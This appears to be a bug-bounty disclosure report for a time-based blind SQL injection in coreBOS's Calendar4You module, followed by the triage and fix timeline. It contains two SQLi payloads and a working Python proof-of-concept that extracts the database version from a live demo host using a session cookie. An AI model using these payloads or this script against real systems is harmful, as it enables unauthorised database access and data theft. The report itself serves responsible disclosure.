SQL Injection in tsolucio/corebos

Valid

Reported on

Dec 20th 2021


Description

coreBOS is vulnerable to Blind SQL Injections in parameter user_view_type which allows the attacker to execute SQL commands on the target database. it is a time-based attack in which the result of the query will be determined based on the time of the response.

payload

1+AND+(SELECT+8513+FROM+(SELECT(SLEEP(5-(IF(ascii(substr(version(),1,1))=53,0,5)))))ZnYh)

Proof of Concept

// Blind_SQL.py
import requests

url = "https://demo.corebos.com/"
query = "index.php?module=Calendar4You&action=Calendar4YouAjax&file=Events&typeids=1,2,4,invite,Assets,Campaigns,Contacts,cbupdater,Invoice,Potentials,CobroPago,ProductComponent&usersids=&view=agendaWeek&event_status=&task_priority=&block_status={\"event_type\":\"block\",\"module_type\":\"block\",\"et_status\":\"block\",\"task_priority\":\"block\"}&save=&start=1639353600&end=1639958400"
Database_Version = []
for i in range(21):
    for x in range(46,58):
        payload = "&user_view_type=1+AND+(SELECT+8513+FROM+(SELECT(SLEEP(2-(IF(ascii(substr(version(),{},1))={},0,5)))))ZnYh)".format(i, x)
        c = {"democoreboscom":"86b8cecae7a5f8d1e2fa41116a7e1ffc"}
        r = requests.get(url+query+payload, cookies=c, timeout=20)
        if r.elapsed.total_seconds() > 2:
            print("[+] Character number {} == {}".format(i,chr(x)))
            Database_Version.append(chr(x))
            continue
        else:
            pass

for i in Database_Version:
    print(i, end='')

Impact

This vulnerability is capable of retrieving sensitive information from the database target system.

Occurrences

the usersids is also vulnerable on the same request but exploited via a different payload.

Payload

'%2b(select+*+from+(select(sleep(1)))a)%2b'
We are processing your report and will contact the tsolucio/corebos team within 24 hours. 5 months ago
itsfading submitted a
5 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 5 months ago
itsfading modified the report
5 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 5 months ago
itsfading
5 months ago

Researcher


any updates?

We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 4 months ago
itsfading has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on 2ce9f3 4 months ago
Joe Bordes has been awarded the fix bounty
SaveEventSettings.php#L13 has been validated
Events.php#L265-L277 has been validated
CalendarView.php#L231 has been validated
to join this conversation